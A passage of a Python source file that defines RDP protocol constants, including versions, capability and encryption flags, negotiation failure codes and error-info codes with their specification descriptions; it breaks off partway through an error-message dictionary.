    RDP5 = 0x80004
    RDP10 = 0x80005
    RDP10_1 = 0x80006
    RDP10_2 = 0x80007
    RDP10_3 = 0x80008
    RDP10_4 = 0x80009
    RDP10_5 = 0x8000A
    RDP10_6 = 0x8000B
    RDP10_7 = 0x8000C
    RDP10_8 = 0x8000d
    RDP10_9 = 0x8000e
    RDP10_10 = 0x8000f
    RDP10_11 = 0x80010


class ColorDepth(IntEnum):
    RNS_UD_COLOR_4BPP = 0xCA00
    RNS_UD_COLOR_8BPP = 0xCA01
    RNS_UD_COLOR_16BPP_555 = 0xCA02
    RNS_UD_COLOR_16BPP_565 = 0xCA03
    RNS_UD_COLOR_24BPP = 0xCA04


class HighColorDepth(IntEnum):
    HIGH_COLOR_4BPP = 4
    HIGH_COLOR_8BPP = 8
    HIGH_COLOR_15BPP = 15
    HIGH_COLOR_16BPP = 16
    HIGH_COLOR_24BPP = 24


class KeyboardType(IntEnum):
    IBM_PC_XT = 1
    OLIVETTI = 2
    IBM_PC_AT = 3
    IBM_ENHANCED = 4
    NOKIA_1050 = 5
    NOKIA_9140 = 6
    JAPANESE = 7


class SupportedColorDepth:
    RNS_UD_24BPP_SUPPORT = 0x0001
    RNS_UD_16BPP_SUPPORT = 0x0002
    RNS_UD_15BPP_SUPPORT = 0x0004
    RNS_UD_32BPP_SUPPORT = 0x0008


class ClientCapabilityFlag:
    RNS_UD_CS_SUPPORT_ERRINFO_PDU = 0x0001
    RNS_UD_CS_WANT_32BPP_SESSION = 0x0002
    RNS_UD_CS_SUPPORT_STATUSINFO_PDU = 0x0004
    RNS_UD_CS_STRONG_ASYMMETRIC_KEYS = 0x0008
    RNS_UD_CS_UNUSED = 0x0010
    RNS_UD_CS_VALID_CONNECTION_TYPE = 0x0020
    RNS_UD_CS_SUPPORT_MONITOR_LAYOUT_PDU = 0x0040
    RNS_UD_CS_SUPPORT_NETCHAR_AUTODETECT = 0x0080
    RNS_UD_CS_SUPPORT_DYNVC_GFX_PROTOCOL = 0x0100
    RNS_UD_CS_SUPPORT_DYNAMIC_TIME_ZONE = 0x0200
    RNS_UD_CS_SUPPORT_HEARTBEAT_PDU = 0x0400


class ServerCapabilityFlag:
    RNS_UD_SC_EDGE_ACTIONS_SUPPORTED_V1 = 1
    RNS_UD_SC_DYNAMIC_DST_SUPPORTED = 2
    RNS_UD_SC_EDGE_ACTIONS_SUPPORTED_V2 = 4


class DrawingFlags(IntEnum):
    """
    https://msdn.microsoft.com/en-us/library/cc240554.aspx
    """
    DRAW_ALLOW_DYNAMIC_COLOR_FIDELITY = 0x02
    DRAW_ALLOW_COLOR_SUBSAMPLING = 0x04
    DRAW_ALLOW_SKIP_ALPHA = 0x08
    DRAW_UNUSED_FLAG = 0x10


class ConnectionType(IntEnum):
    CONNECTION_TYPE_UNKNOWN = 0x00
    CONNECTION_TYPE_MODEM = 0x01
    CONNECTION_TYPE_BROADBAND_LOW = 0x02
    CONNECTION_TYPE_SATELLITE = 0x03
    CONNECTION_TYPE_BROADBAND_HIGH = 0x04
    CONNECTION_TYPE_WAN = 0x05
    CONNECTION_TYPE_LAN = 0x06
    CONNECTION_TYPE_AUTODETECT = 0x07


class DesktopOrientation(IntEnum):
    ORIENTATION_LANDSCAPE = 0
    ORIENTATION_PORTRAIT = 90
    ORIENTATION_LANDSCAPE_FLIPPED = 180
    ORIENTATION_PORTRAIT_FLIPPED = 270


class EncryptionMethod(IntFlag):
    ENCRYPTION_NONE = 0x00
    ENCRYPTION_40BIT = 0x01
    ENCRYPTION_128BIT = 0x02
    ENCRYPTION_56BIT = 0x08
    ENCRYPTION_FIPS = 0x10


class EncryptionLevel(IntEnum):
    ENCRYPTION_LEVEL_NONE = 0
    ENCRYPTION_LEVEL_LOW = 1
    ENCRYPTION_LEVEL_CLIENT_COMPATIBLE = 2
    ENCRYPTION_LEVEL_HIGH = 3
    ENCRYPTION_LEVEL_FIPS = 4


class ClusterFlags(IntEnum):
    REDIRECTION_SUPPORTED = 0x01
    REDIRECTED_SESSIONID_FIELD_VALID = 0x02
    SERVER_SESSION_REDIRECTION_VERSION_MASK = 0x3C
    REDIRECTED_SMARTCARD = 0x40


class RedirectionVersion(IntEnum):
    REDIRECTION_VERSION1 = 0
    REDIRECTION_VERSION2 = 1
    REDIRECTION_VERSION3 = 2
    REDIRECTION_VERSION4 = 3
    REDIRECTION_VERSION5 = 4
    REDIRECTION_VERSION6 = 5


class ServerCertificateType(IntEnum):
    PROPRIETARY = 1
    X509 = 2


class NegotiationProtocols(IntFlag):
    NONE = 0
    SSL = 0b00000001
    CRED_SSP = 0b00000010
    EARLY_USER_AUTHORIZATION_RESULT = 0b00001000


class NegotiationFailureCode(IntEnum):
    """
    RDP Negotiation Failure error messages
    See: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/1b3920e7-0116-4345-bc45-f2c4ad012761
    """

    SSL_REQUIRED_BY_SERVER = 0x00000001
    SSL_NOT_ALLOWED_BY_SERVER = 0x00000002
    SSL_CERT_NOT_ON_SERVER = 0x00000003
    INCONSISTENT_FLAGS = 0x00000004
    HYBRID_REQUIRED_BY_SERVER = 0x00000005
    SSL_WITH_USER_AUTH_REQUIRED_BY_SERVER = 0x00000006

    
    @staticmethod
    def getMessage(code: "NegotiationFailureCode"):
        MESSAGES = {
            NegotiationFailureCode.SSL_REQUIRED_BY_SERVER: "The server requires that the client support Enhanced RDP Security (section 5.4) with either TLS 1.0, 1.1 or 1.2 (section 5.4.5.1) or CredSSP (section 5.4.5.2). If only CredSSP was requested then the server only supports TLS.",
            NegotiationFailureCode.SSL_NOT_ALLOWED_BY_SERVER: "The server is configured to only use Standard RDP Security mechanisms (section 5.3) and does not support any External Security Protocols (section 5.4.5).",
            NegotiationFailureCode.SSL_CERT_NOT_ON_SERVER: "The server does not possess a valid authentication certificate and cannot initialize the External Security Protocol Provider (section 5.4.5).",
            NegotiationFailureCode.INCONSISTENT_FLAGS: "The list of requested security protocols is not consistent with the current security protocol in effect. This error is only possible when the Direct Approach (sections 5.4.2.2 and 1.3.1.2) is used and an External Security Protocol (section 5.4.5) is already being used.",
            NegotiationFailureCode.HYBRID_REQUIRED_BY_SERVER: "The server requires that the client support Enhanced RDP Security (section 5.4) with CredSSP (section 5.4.5.2).",
            NegotiationFailureCode.SSL_WITH_USER_AUTH_REQUIRED_BY_SERVER: "The server requires that the client support Enhanced RDP Security (section 5.4) with TLS 1.0, 1.1 or 1.2 (section 5.4.5.1) and certificate-based client authentication."
        }
        return MESSAGES.get(code, "Unknown Error")


class CapabilityType(IntEnum):
    CAPSTYPE_GENERAL = 0x0001
    CAPSTYPE_BITMAP = 0x0002
    CAPSTYPE_ORDER = 0x0003
    CAPSTYPE_BITMAPCACHE = 0x0004
    CAPSTYPE_CONTROL = 0x0005
    CAPSTYPE_ACTIVATION = 0x0007
    CAPSTYPE_POINTER = 0x0008
    CAPSTYPE_SHARE = 0x0009
    CAPSTYPE_COLORCACHE = 0x000A
    CAPSTYPE_SOUND = 0x000C
    CAPSTYPE_INPUT = 0x000D
    CAPSTYPE_FONT = 0x000E
    CAPSTYPE_BRUSH = 0x000F
    CAPSTYPE_GLYPHCACHE = 0x0010
    CAPSTYPE_OFFSCREENCACHE = 0x0011
    CAPSTYPE_BITMAPCACHE_HOSTSUPPORT = 0x0012
    CAPSTYPE_BITMAPCACHE_REV2 = 0x0013
    CAPSTYPE_VIRTUALCHANNEL = 0x0014
    CAPSTYPE_DRAWNINEGRIDCACHE = 0x0015
    CAPSTYPE_DRAWGDIPLUS = 0x0016
    CAPSTYPE_RAIL = 0x0017
    CAPSTYPE_WINDOW = 0x0018
    CAPSETTYPE_COMPDESK = 0x0019
    CAPSETTYPE_MULTIFRAGMENTUPDATE = 0x001A
    CAPSETTYPE_LARGE_POINTER = 0x001B
    CAPSETTYPE_SURFACE_COMMANDS = 0x001C
    CAPSETTYPE_BITMAP_CODECS = 0x001D
    CAPSSETTYPE_FRAME_ACKNOWLEDGE = 0x001E


class MajorType(IntEnum):
    OSMAJORTYPE_UNSPECIFIED = 0x0000
    OSMAJORTYPE_WINDOWS = 0x0001
    OSMAJORTYPE_OS2 = 0x0002
    OSMAJORTYPE_MACINTOSH = 0x0003
    OSMAJORTYPE_UNIX = 0x0004
    OSMAJORTYPE_IOS = 0x0005
    OSMAJORTYPE_OSX = 0x0006
    OSMAJORTYPE_ANDROID = 0x0007


class MinorType(IntEnum):
    OSMINORTYPE_UNSPECIFIED = 0x0000
    OSMINORTYPE_WINDOWS_31X = 0x0001
    OSMINORTYPE_WINDOWS_95 = 0x0002
    OSMINORTYPE_WINDOWS_NT = 0x0003
    OSMINORTYPE_OS2_V21 = 0x0004
    OSMINORTYPE_POWER_PC = 0x0005
    OSMINORTYPE_MACINTOSH = 0x0006
    OSMINORTYPE_NATIVE_XSERVER = 0x0007
    OSMINORTYPE_PSEUDO_XSERVER = 0x0008
    OSMINORTYPE_WINDOWS_RT = 0x0009


class GeneralExtraFlag:
    FASTPATH_OUTPUT_SUPPORTED = 0x0001
    NO_BITMAP_COMPRESSION_HDR = 0x0400
    LONG_CREDENTIALS_SUPPORTED = 0x0004
    AUTORECONNECT_SUPPORTED = 0x0008
    ENC_SALTED_CHECKSUM = 0x0010


class OrderFlag:
    NEGOTIATEORDERSUPPORT = 0x0002
    ZEROBOUNDSDELTASSUPPORT = 0x0008
    COLORINDEXSUPPORT = 0x0020
    SOLIDPATTERNBRUSHONLY = 0x0040
    ORDERFLAGS_EXTRA_FLAGS = 0x0080


class Order(IntEnum):
    TS_NEG_DSTBLT_INDEX = 0x00
    TS_NEG_PATBLT_INDEX = 0x01
    TS_NEG_SCRBLT_INDEX = 0x02
    TS_NEG_MEMBLT_INDEX = 0x03
    TS_NEG_MEM3BLT_INDEX = 0x04
    TS_NEG_DRAWNINEGRID_INDEX = 0x07
    TS_NEG_LINETO_INDEX = 0x08
    TS_NEG_MULTI_DRAWNINEGRID_INDEX = 0x09
    TS_NEG_SAVEBITMAP_INDEX = 0x0B
    TS_NEG_MULTIDSTBLT_INDEX = 0x0F
    TS_NEG_MULTIPATBLT_INDEX = 0x10
    TS_NEG_MULTISCRBLT_INDEX = 0x11
    TS_NEG_MULTIOPAQUERECT_INDEX = 0x12
    TS_NEG_FAST_INDEX_INDEX = 0x13
    TS_NEG_POLYGON_SC_INDEX = 0x14
    TS_NEG_POLYGON_CB_INDEX = 0x15
    TS_NEG_POLYLINE_INDEX = 0x16
    TS_NEG_FAST_GLYPH_INDEX = 0x18
    TS_NEG_ELLIPSE_SC_INDEX = 0x19
    TS_NEG_ELLIPSE_CB_INDEX = 0x1A
    TS_NEG_INDEX_INDEX = 0x1B


class OrderEx:
    ORDERFLAGS_EX_CACHE_BITMAP_REV3_SUPPORT = 0x0002
    ORDERFLAGS_EX_ALTSEC_FRAME_MARKER_SUPPORT = 0x0004


class InputFlags:
    INPUT_FLAG_SCANCODES = 0x0001
    INPUT_FLAG_MOUSEX = 0x0004
    INPUT_FLAG_FASTPATH_INPUT = 0x0008
    INPUT_FLAG_UNICODE = 0x0010
    INPUT_FLAG_FASTPATH_INPUT2 = 0x0020
    INPUT_FLAG_UNUSED1 = 0x0040
    INPUT_FLAG_UNUSED2 = 0x0080
    TS_INPUT_FLAG_MOUSE_HWHEEL = 0x0100


class BrushSupport(IntEnum):
    BRUSH_DEFAULT = 0x00000000
    BRUSH_COLOR_8x8 = 0x00000001
    BRUSH_COLOR_FULL = 0x00000002


class GlyphSupport(IntEnum):
    GLYPH_SUPPORT_NONE = 0x0000
    GLYPH_SUPPORT_PARTIAL = 0x0001
    GLYPH_SUPPORT_FULL = 0x0002
    GLYPH_SUPPORT_ENCODE = 0x0003


class OffscreenSupportLevel(IntEnum):
    FALSE = 0x00000000
    TRUE = 0x00000001


class VirtualChannelCompressionFlag:
    VCCAPS_NO_COMPR = 0x00000000
    VCCAPS_COMPR_SC = 0x00000001
    VCCAPS_COMPR_CS_8K = 0x00000002


class SoundFlag:
    NONE = 0x0000
    SOUND_BEEPS_FLAG = 0x0001


class ErrorInfo(IntEnum):
    ERRINFO_NONE = 0x00000000
    ERRINFO_RPC_INITIATED_DISCONNECT = 0x00000001
    ERRINFO_RPC_INITIATED_LOGOFF = 0x00000002
    ERRINFO_IDLE_TIMEOUT = 0x00000003
    ERRINFO_LOGON_TIMEOUT = 0x00000004
    ERRINFO_DISCONNECTED_BY_OTHERCONNECTION = 0x00000005
    ERRINFO_OUT_OF_MEMORY = 0x00000006
    ERRINFO_SERVER_DENIED_CONNECTION = 0x00000007
    ERRINFO_SERVER_INSUFFICIENT_PRIVILEGES = 0x00000009
    ERRINFO_SERVER_FRESH_CREDENTIALS_REQUIRED = 0x0000000A
    ERRINFO_RPC_INITIATED_DISCONNECT_BYUSER = 0x0000000B
    ERRINFO_LOGOFF_BY_USER = 0x0000000C
    ERRINFO_SERVER_SHUTDOWN = 0x000000019
    ERRINFO_LICENSE_INTERNAL = 0x00000100
    ERRINFO_LICENSE_NO_LICENSE_SERVER = 0x00000101
    ERRINFO_LICENSE_NO_LICENSE = 0x00000102
    ERRINFO_LICENSE_BAD_CLIENT_MSG = 0x00000103
    ERRINFO_LICENSE_HWID_DOESNT_MATCH_LICENSE = 0x00000104
    ERRINFO_LICENSE_BAD_CLIENT_LICENSE = 0x00000105
    ERRINFO_LICENSE_CANT_FINISH_PROTOCOL = 0x00000106
    ERRINFO_LICENSE_CLIENT_ENDED_PROTOCOL = 0x00000107
    ERRINFO_LICENSE_BAD_CLIENT_ENCRYPTION = 0x00000108
    ERRINFO_LICENSE_CANT_UPGRADE_LICENSE = 0x00000109
    ERRINFO_LICENSE_NO_REMOTE_CONNECTIONS = 0x0000010A
    ERRINFO_CB_DESTINATION_NOT_FOUND = 0x0000400
    ERRINFO_CB_LOADING_DESTINATION = 0x0000402
    ERRINFO_CB_REDIRECTING_TO_DESTINATION = 0x0000404
    ERRINFO_CB_SESSION_ONLINE_VM_WAKE = 0x0000405
    ERRINFO_CB_SESSION_ONLINE_VM_BOOT = 0x0000406
    ERRINFO_CB_SESSION_ONLINE_VM_NO_DNS = 0x0000407
    ERRINFO_CB_DESTINATION_POOL_NOT_FREE = 0x0000408
    ERRINFO_CB_CONNECTION_CANCELLED = 0x0000409
    ERRINFO_CB_CONNECTION_ERROR_INVALID_SETTINGS = 0x0000410
    ERRINFO_CB_SESSION_ONLINE_VM_BOOT_TIMEOUT = 0x0000411
    ERRINFO_CB_SESSION_ONLINE_VM_SESSMON_FAILED = 0x0000412
    ERRINFO_UNKNOWNPDUTYPE2 = 0x000010C9
    ERRINFO_UNKNOWNPDUTYPE = 0x000010CA
    ERRINFO_DATAPDUSEQUENCE = 0x000010CB
    ERRINFO_CONTROLPDUSEQUENCE = 0x000010CD
    ERRINFO_INVALIDCONTROLPDUACTION = 0x000010CE
    ERRINFO_INVALIDINPUTPDUTYPE = 0x000010CF
    ERRINFO_INVALIDINPUTPDUMOUSE = 0x000010D0
    ERRINFO_INVALIDREFRESHRECTPDU = 0x000010D1
    ERRINFO_CREATEUSERDATAFAILED = 0x000010D2
    ERRINFO_CONNECTFAILED = 0x000010D3
    ERRINFO_CONFIRMACTIVEWRONGSHAREID = 0x000010D4
    ERRINFO_CONFIRMACTIVEWRONGORIGINATOR = 0x000010D5
    ERRINFO_PERSISTENTKEYPDUBADLENGTH = 0x000010DA
    ERRINFO_PERSISTENTKEYPDUILLEGALFIRST = 0x000010DB
    ERRINFO_PERSISTENTKEYPDUTOOMANYTOTALKEYS = 0x000010DC
    ERRINFO_PERSISTENTKEYPDUTOOMANYCACHEKEYS = 0x000010DD
    ERRINFO_INPUTPDUBADLENGTH = 0x000010DE
    ERRINFO_BITMAPCACHEERRORPDUBADLENGTH = 0x000010DF
    ERRINFO_SECURITYDATATOOSHORT = 0x000010E0
    ERRINFO_VCHANNELDATATOOSHORT = 0x000010E1
    ERRINFO_SHAREDATATOOSHORT = 0x000010E2
    ERRINFO_BADSUPRESSOUTPUTPDU = 0x000010E3
    ERRINFO_CONFIRMACTIVEPDUTOOSHORT = 0x000010E5
    ERRINFO_CAPABILITYSETTOOSMALL = 0x000010E7
    ERRINFO_CAPABILITYSETTOOLARGE = 0x000010E8
    ERRINFO_NOCURSORCACHE = 0x000010E9
    ERRINFO_BADCAPABILITIES = 0x000010EA
    ERRINFO_VIRTUALCHANNELDECOMPRESSIONERR = 0x000010EC
    ERRINFO_INVALIDVCCOMPRESSIONTYPE = 0x000010ED
    ERRINFO_INVALIDCHANNELID = 0x000010EF
    ERRINFO_VCHANNELSTOOMANY = 0x000010F0
    ERRINFO_REMOTEAPPSNOTENABLED = 0x000010F3
    ERRINFO_CACHECAPNOTSET = 0x000010F4
    ERRINFO_BITMAPCACHEERRORPDUBADLENGTH2 = 0x000010F5
    ERRINFO_OFFSCRCACHEERRORPDUBADLENGTH = 0x000010F6
    ERRINFO_DNGCACHEERRORPDUBADLENGTH = 0x000010F7
    ERRINFO_GDIPLUSPDUBADLENGTH = 0x000010F8
    ERRINFO_SECURITYDATATOOSHORT2 = 0x00001111
    ERRINFO_SECURITYDATATOOSHORT3 = 0x00001112
    ERRINFO_SECURITYDATATOOSHORT4 = 0x00001113
    ERRINFO_SECURITYDATATOOSHORT5 = 0x00001114
    ERRINFO_SECURITYDATATOOSHORT6 = 0x00001115
    ERRINFO_SECURITYDATATOOSHORT7 = 0x00001116
    ERRINFO_SECURITYDATATOOSHORT8 = 0x00001117
    ERRINFO_SECURITYDATATOOSHORT9 = 0x00001118
    ERRINFO_SECURITYDATATOOSHORT10 = 0x00001119
    ERRINFO_SECURITYDATATOOSHORT11 = 0x0000111A
    ERRINFO_SECURITYDATATOOSHORT12 = 0x0000111B
    ERRINFO_SECURITYDATATOOSHORT13 = 0x0000111C
    ERRINFO_SECURITYDATATOOSHORT14 = 0x0000111D
    ERRINFO_SECURITYDATATOOSHORT15 = 0x0000111E
    ERRINFO_SECURITYDATATOOSHORT16 = 0x0000111F
    ERRINFO_SECURITYDATATOOSHORT17 = 0x00001120
    ERRINFO_SECURITYDATATOOSHORT18 = 0x00001121
    ERRINFO_SECURITYDATATOOSHORT19 = 0x00001122
    ERRINFO_SECURITYDATATOOSHORT20 = 0x00001123
    ERRINFO_SECURITYDATATOOSHORT21 = 0x00001124
    ERRINFO_SECURITYDATATOOSHORT22 = 0x00001125
    ERRINFO_SECURITYDATATOOSHORT23 = 0x00001126
    ERRINFO_BADMONITORDATA = 0x00001129
    ERRINFO_VCDECOMPRESSEDREASSEMBLEFAILED = 0x0000112A
    ERRINFO_VCDATATOOLONG = 0x0000112B
    ERRINFO_BAD_FRAME_ACK_DATA = 0x0000112C
    ERRINFO_GRAPHICSMODENOTSUPPORTED = 0x0000112D
    ERRINFO_GRAPHICSSUBSYSTEMRESETFAILED = 0x0000112E
    ERRINFO_GRAPHICSSUBSYSTEMFAILED = 0x0000112F
    ERRINFO_TIMEZONEKEYNAMELENGTHTOOSHORT = 0x00001130
    ERRINFO_TIMEZONEKEYNAMELENGTHTOOLONG = 0x00001131
    ERRINFO_DYNAMICDSTDISABLEDFIELDMISSING = 0x00001132
    ERRINFO_VCDECODINGERROR = 0x00001133
    ERRINFO_UPDATESESSIONKEYFAILED = 0x00001191
    ERRINFO_DECRYPTFAILED = 0x00001192
    ERRINFO_ENCRYPTFAILED = 0x00001193
    ERRINFO_ENCPKGMISMATCH = 0x00001194
    ERRINFO_DECRYPTFAILED2 = 0x00001195

    @staticmethod
    def getText(errorInfo: 'ErrorInfo') -> str:
        MESSAGES = {
            ErrorInfo.ERRINFO_RPC_INITIATED_DISCONNECT: "The disconnection was initiated by an administrative tool on the server in another session.",
            ErrorInfo.ERRINFO_RPC_INITIATED_LOGOFF: "The disconnection was due to a forced logoff initiated by an administrative tool on the server in another session.",
            ErrorInfo.ERRINFO_IDLE_TIMEOUT: "The idle session limit timer on the server has elapsed.",
            ErrorInfo.ERRINFO_LOGON_TIMEOUT: "The active session limit timer on the server has elapsed.",
            ErrorInfo.ERRINFO_DISCONNECTED_BY_OTHERCONNECTION: "Another user connected to the server, forcing the disconnection of the current connection.",
            ErrorInfo.ERRINFO_OUT_OF_MEMORY: "The server ran out of available memory resources.",
            ErrorInfo.ERRINFO_SERVER_DENIED_CONNECTION: "The server denied the connection.",
            ErrorInfo.ERRINFO_SERVER_INSUFFICIENT_PRIVILEGES: "The user cannot connect to the server due to insufficient access privileges.",
            ErrorInfo.ERRINFO_SERVER_FRESH_CREDENTIALS_REQUIRED: "The server does not accept saved user credentials and requires that the user enter their credentials for each connection.",
            ErrorInfo.ERRINFO_RPC_INITIATED_DISCONNECT_BYUSER: "The disconnection was initiated by an administrative tool on the server running in the user's session.",
            ErrorInfo.ERRINFO_LOGOFF_BY_USER: "The disconnection was initiated by the user logging off his or her session on the server.",
            ErrorInfo.ERRINFO_LICENSE_INTERNAL: "An internal error has occurred in the Terminal Services licensing component.",
            ErrorInfo.ERRINFO_LICENSE_NO_LICENSE_SERVER: "A Remote Desktop License Server ([MS-RDPELE] section 1.1) could not be found to provide a license.",
            ErrorInfo.ERRINFO_LICENSE_NO_LICENSE: "There are no Client Access Licenses ([MS-RDPELE] section 1.1) available for the target remote computer.",
            ErrorInfo.ERRINFO_LICENSE_BAD_CLIENT_MSG: "The remote computer received an invalid licensing message from the client.",
            ErrorInfo.ERRINFO_LICENSE_HWID_DOESNT_MATCH_LICENSE: "The Client Access License ([MS-RDPELE] section 1.1) stored by the client has been modified.",
            ErrorInfo.ERRINFO_LICENSE_BAD_CLIENT_LICENSE: "The Client Access License ([MS-RDPELE] section 1.1) stored by the client is in an invalid format",
            ErrorInfo.ERRINFO_LICENSE_CANT_FINISH_PROTOCOL: "Network problems have caused the licensing protocol ([MS-RDPELE] section 1.3.3) to be terminated.",
            ErrorInfo.ERRINFO_LICENSE_CLIENT_ENDED_PROTOCOL: "The client prematurely ended the licensing protocol ([MS-RDPELE] section 1.3.3).",
            ErrorInfo.ERRINFO_LICENSE_BAD_CLIENT_ENCRYPTION: "A licensing message ([MS-RDPELE] sections 2.2 and 5.1) was incorrectly encrypted.",
            ErrorInfo.ERRINFO_LICENSE_CANT_UPGRADE_LICENSE: "The Client Access License ([MS-RDPELE] section 1.1) stored by the client could not be upgraded or renewed.",
            ErrorInfo.ERRINFO_LICENSE_NO_REMOTE_CONNECTIONS: "The remote computer is not licensed to accept remote connections.",
            ErrorInfo.ERRINFO_CB_DESTINATION_NOT_FOUND: "The target endpoint could not be found.",
            ErrorInfo.ERRINFO_CB_LOADING_DESTINATION: "The target endpoint to which the client is being redirected is disconnecting from the Connection Broker.",
            ErrorInfo.ERRINFO_CB_REDIRECTING_TO_DESTINATION: "An error occurred while the connection was being redirected to the target endpoint.",
            ErrorInfo.ERRINFO_CB_SESSION_ONLINE_VM_WAKE: "An error occurred while the target endpoint (a virtual machine) was being awakened.",
            ErrorInfo.ERRINFO_CB_SESSION_ONLINE_VM_BOOT: "An error occurred while the target endpoint (a virtual machine) was being started.",
            ErrorInfo.ERRINFO_CB_SESSION_ONLINE_VM_NO_DNS: "The IP address of the target endpoint (a virtual machine) cannot be determined.",
            ErrorInfo.ERRINFO_CB_DESTINATION_POOL_NOT_FREE: "There are no available endpoints in the pool managed by the Connection Broker.",
            ErrorInfo.ERRINFO_CB_CONNECTION_CANCELLED: "Processing of the connection has been cancelled.",
            ErrorInfo.ERRINFO_CB_CONNECTION_ERROR_INVALID_SETTINGS: "The settings contained in the routingToken field of the X.224 Connection Request PDU (section 2.2.1.1) cannot be validated.",
            ErrorInfo.ERRINFO_CB_SESSION_ONLINE_VM_BOOT_TIMEOUT: "A time-out occurred while the target endpoint (a virtual machine) was being started.",
            ErrorInfo.ERRINFO_CB_SESSION_ONLINE_VM_SESSMON_FAILED: "A session monitoring error occurred while the target endpoint (a virtual machine) was being started.",
            ErrorInfo.ERRINFO_UNKNOWNPDUTYPE2: "Unknown pduType2 field in a received Share Data Header (section 2.2.8.1.1.1.2).",
            ErrorInfo.ERRINFO_UNKNOWNPDUTYPE: "Unknown pduType field in a received Share Control Header (section 2.2.8.1.1.1.1).",
            ErrorInfo.ERRINFO_DATAPDUSEQUENCE: "An out-of-sequence Slow-Path Data PDU (section 2.2.8.1.1.1.1) has been received.",
            ErrorInfo.ERRINFO_CONTROLPDUSEQUENCE: "An out-of-sequence Slow-Path Non-Data PDU (section 2.2.8.1.1.1.1) has been received.",
            ErrorInfo.ERRINFO_INVALIDCONTROLPDUACTION: "A Control PDU (sections 2.2.1.15 and 2.2.1.16) has been received with an invalid action field.",
            ErrorInfo.ERRINFO_INVALIDINPUTPDUTYPE: "A Slow-Path Input Event (section 2.2.8.1.1.3.1.1) has been received with an invalid messageType field OR A Fast-Path Input Event (section 2.2.8.1.2.2) has been received with an invalid eventCode field",
            ErrorInfo.ERRINFO_INVALIDINPUTPDUMOUSE: "A Slow-Path Mouse Event (section 2.2.8.1.1.3.1.1.3) or Extended Mouse Event (section 2.2.8.1.1.3.1.1.4) has been received with an invalid pointerFlags field OR A Fast-Path Mouse Event (section 2.2.8.1.2.2.3) or Fast-Path Extended Mouse Event (section 2.2.8.1.2.2.4) has been received with an invalid pointerFlags field.",
            ErrorInfo.ERRINFO_INVALIDREFRESHRECTPDU: "An invalid Refresh Rect PDU (section 2.2.11.2) has been received.",
            ErrorInfo.ERRINFO_CREATEUSERDATAFAILED: "The server failed to construct the GCC Conference Create Response user data (section 2.2.1.4).",
            ErrorInfo.ERRINFO_CONNECTFAILED: "Processing during the Channel Connection phase of the RDP Connection Sequence (see section 1.3.1.1 for an overview of the RDP Connection Sequence phases) has failed.",
            ErrorInfo.ERRINFO_CONFIRMACTIVEWRONGSHAREID: "A Confirm Active PDU (section 2.2.1.13.2) was received from the client with an invalid shareId field.",
            ErrorInfo.ERRINFO_CONFIRMACTIVEWRONGORIGINATOR: "A Confirm Active PDU (section 2.2.1.13.2) was received from the client with an invalid originatorId field.",
            ErrorInfo.ERRINFO_PERSISTENTKEYPDUBADLENGTH: "There is not enough data to process a Persistent Key List PDU (section 2.2.1.17).",
            ErrorInfo.ERRINFO_PERSISTENTKEYPDUILLEGALFIRST: "A Persistent Key List PDU (section 2.2.1.17) marked as PERSIST_PDU_FIRST (0x01) was received after the reception of a prior Persistent Key List PDU also marked as PERSIST_PDU_FIRST.",
            ErrorInfo.ERRINFO_PERSISTENTKEYPDUTOOMANYTOTALKEYS: "A Persistent Key List PDU (section 2.2.1.17) was received which specified a total number of bitmap cache entries larger than 262144.",
            ErrorInfo.ERRINFO_PERSISTENTKEYPDUTOOMANYCACHEKEYS: "A Persistent Key List PDU (section 2.2.1.17) was received which specified an invalid total number of keys for a bitmap cache (the number of entries that can be stored within each bitmap cache is specified in the Revision 1 or 2 Bitmap Cache Capability Set (section 2.2.7.1.4) that is sent from client to server).",
            ErrorInfo.ERRINFO_INPUTPDUBADLENGTH: "There is not enough data to process Input Event PDU Data (section 2.2.8.1.1.3.1) or a Fast-Path Input Event PDU (section 2.2.8.1.2).",
            ErrorInfo.ERRINFO_BITMAPCACHEERRORPDUBADLENGTH: "There is not enough data to process the shareDataHeader, NumInfoBlocks, Pad1, and Pad2 fields of the Bitmap Cache Error PDU Data ([MS-RDPEGDI] section 2.2.2.3.1.1).",
            ErrorInfo.ERRINFO_SECURITYDATATOOSHORT: "The dataSignature field of the Fast-Path Input Event PDU (section 2.2.8.1.2) does not contain enough data OR The fipsInformation and dataSignature fields of the Fast-Path Input Event PDU (section 2.2.8.1.2) do not contain enough data.",
            ErrorInfo.ERRINFO_VCHANNELDATATOOSHORT: "There is not enough data in the Client Network Data (section 2.2.1.3.4) to read the virtual channel configuration data OR There is not enough data to read a complete Channel PDU Header (section 2.2.6.1.1).",
            ErrorInfo.ERRINFO_SHAREDATATOOSHORT: "There is not enough data to process Control PDU Data (section 2.2.1.15.1) OR There is not enough data to read a complete Share Control Header (section 2.2.8.1.1.1.1) OR There is not enough data to read a complete Share Data Header (section 2.2.8.1.1.1.2) of a Slow-Path Data PDU (section 2.2.8.1.1.1.1) OR There is not enough data to process Font List PDU Data (section 2.2.1.18.1).",
            ErrorInfo.ERRINFO_BADSUPRESSOUTPUTPDU: "There is not enough data to process Suppress Output PDU Data (section 2.2.11.3.1) OR The allowDisplayUpdates field of the Suppress Output PDU Data (section 2.2.11.3.1) is invalid.",
            ErrorInfo.ERRINFO_CONFIRMACTIVEPDUTOOSHORT: "There is not enough data to read the shareControlHeader, shareId, originatorId, lengthSourceDescriptor, and lengthCombinedCapabilities fields of the Confirm Active PDU Data (section 2.2.1.13.2.1) OR There is not enough data to read the sourceDescriptor, numberCapabilities, pad2Octets, and capabilitySets fields of the Confirm Active PDU Data (section 2.2.1.13.2.1).",
            ErrorInfo.ERRINFO_CAPABILITYSETTOOSMALL: "There is not enough data to read the capabilitySetType and the lengthCapability fields in a received Capability Set (section 2.2.1.13.1.1.1).",
            ErrorInfo.ERRINFO_CAPABILITYSETTOOLARGE: "A Capability Set (section 2.2.1.13.1.1.1) has been received with a lengthCapability field that contains a value greater than the total length of the data received.",
            ErrorInfo.ERRINFO_NOCURSORCACHE: "Both the colorPointerCacheSize and pointerCacheSize fields in the Pointer Capability Set (section 2.2.7.1.5) are set to zero OR The pointerCacheSize field in the Pointer Capability Set (section 2.2.7.1.5) is not present, and the colorPointerCacheSize field is set to zero.",
            ErrorInfo.ERRINFO_BADCAPABILITIES: "The capabilities received from the client in the Confirm Active PDU (section 2.2.1.13.2) were not accepted by the server.",
